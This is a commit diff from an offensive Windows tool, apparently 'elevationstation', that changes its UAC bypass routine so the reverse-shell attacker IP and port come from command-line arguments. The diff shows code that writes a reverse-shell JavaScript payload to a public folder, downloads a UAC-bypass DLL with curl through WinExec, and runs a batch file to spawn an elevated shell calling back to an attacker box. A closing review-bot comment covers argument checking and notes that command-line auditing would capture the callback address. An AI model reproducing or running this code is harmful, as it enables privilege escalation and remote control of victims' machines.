
Commit 112b76c

committed
replacing input() with cmd args
c++ input() can be problematic. Switching to using commandline args for input instead
1 parent ba521d9 commit 112b76c


1 file changed

+16
-11
lines changed


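--- a/elevationstation/elevationstation.cpp
+++ b/elevationstation/elevationstation.cpp
@@ -845,7 +845,7 @@ int DupProcessToken(DWORD pid)
 
 }
 
-void uacbypass()
+void uacbypass(char* theip, char* theport)
 {
 DWORD procintegrity=CheckProcessIntegrity(GetCurrentProcessId());
 if (procintegrity != 0x3000)
@@ -862,12 +862,16 @@ void uacbypass()
 exit(0);
 }
 
+
+string revip = theip;
+string portnum = theport;
+
 cout << "generating rev shell payload now...\n";
-string revip, portnum;
-cout << "enter the ip for your attacker box for the rev3rse sh3ll:\n";
-cin >> revip;
-cout << "enter the port number for the rev3rse sh3ll:\n";
-cin >> portnum;
+//string revip, portnum;
+//cout << "enter the ip for your attacker box for the rev3rse sh3ll:\n";
+//cin >> revip;
+//cout << "enter the port number for the rev3rse sh3ll:\n";
+//cin >> portnum;
 
 ofstream mypayload;
 mypayload.open("c:\\users\\public\\elevationstation.js");
@@ -911,10 +915,11 @@ void uacbypass()
 WinExec("curl -# -L -o \"c:\\temp\\netutils.dll\" \"https://github.com/g3tsyst3m/elevationstation/raw/main/uacbypass_files/netutils.dll\"", 0); //UAC byp@ss DLL, downloaded directly from the elevationstation repo folder
 Color(2);
 cout << "[+] while waiting for download to finish, go ahead and start your listener on your attacker box\n";
-cout << "You can see the download progress for two files in your foothold reverse shell ;)\nhit [enter] when both reach 100 percent and enjoy your newly spawned elevated shell!\n";
+//cout << "You can see the download progress for two files in your foothold reverse shell ;)\nhit [enter] when both reach 100 percent and enjoy your newly spawned elevated shell!\n";
 Color(7);
-cin.get();
-cin.get();
+Sleep(7000);
+//cin.get();
+//cin.get();
 WinExec("c:\\users\\public\\elevateit.bat", 0);
 
 }
@@ -927,7 +932,7 @@ void commandlist()
 printf("usage: elevationstation.exe -p 1234 -d\n");
 printf("usage: elevationstation.exe -p 1234 -dt\n");
 printf("usage: elevationstation.exe -np\n");
-printf("usage: elevationstation.exe -uac\n");
+printf("usage: elevationstation.exe -uac attackerip port\n");
 printf("usage: elevationstation.exe -p 1234 -dll\n");
 printf("usage: elevationstation.exe -lcp\n");
 printf("usage: elevationstation.exe -p 1234 -l\n");
@@ -968,7 +973,7 @@ int main(int argc, char* argv[])
 }
 if (strcmp(argv[1], "-uac") == 0)
 {
-uacbypass();
+uacbypass(argv[2], argv[3]);
 exit(0);
 }
 if (strcmp(argv[1], "-lcp") == 0)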
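Review bot: The new call `uacbypass(argv[2], argv[3]);` in main() is made with no visible check on `argc`, so `-uac` with fewer than two further arguments hands a null or out-of-range pointer to `string revip = theip;`, which is undefined behaviour. Unless a check exists outside the hunk, the branch should test the count first, e.g. `if (argc < 4) { commandlist(); exit(0); }`, and the parameters can be declared `const char*` since they are only copied. The five commented-out prompt lines and the commented-out `cin.get()` calls are dead code that version control already preserves, so they should be deleted rather than left in the body. For anyone reading this commit as a detection reference, the callback address and port now appear on the process command line, so process-creation auditing that records command lines will capture them. Both main() and uacbypass() continue outside the hunks shown.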
